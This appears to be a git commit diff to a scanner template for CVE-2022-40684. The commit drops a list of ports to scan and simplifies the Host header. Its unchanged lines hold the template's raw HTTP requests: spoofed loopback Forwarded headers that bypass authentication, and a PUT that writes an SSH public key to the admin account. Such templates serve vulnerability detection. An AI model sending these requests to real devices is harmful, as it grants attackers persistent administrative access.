Update CVE-2022-40684.yaml

2022-11-04 15:38:24 +05:30 · 2022-11-04 15:38:24 +05:30 · 5a33e1b9ad
parent 51bc7f86d4
commit 5a33e1b9ad
1 changed files with 3 additions and 13 deletions
--- a/cves/2022/CVE-2022-40684.yaml
+++ b/cves/2022/CVE-2022-40684.yaml
@ -20,14 +20,14 @@ requests:
  - raw:
      - |
        GET /api/v2/cmdb/system/admin HTTP/1.1
-        Host: {{Hostname}}:{{port}}
+        Host: {{Hostname}}
        User-Agent: Node.js
        Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=
        X-Forwarded-Vdom: root

      - |
        PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
-        Host: {{Hostname}}:{{port}}
+        Host: {{Hostname}}
        User-Agent: Report Runner
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
@ -36,17 +36,7 @@ requests:
        {
           "ssh-public-key1":"{{randstr}}"
        }
-    attack: clusterbomb
-    payloads:
-      port:
-        - 443
-        - 8443
-        - 10443
-        - 80
-        - 4443
-        - 9443
-        - 6443
-        - 7443
+
    stop-at-first-match: true
    req-condition: true
    matchers-condition: or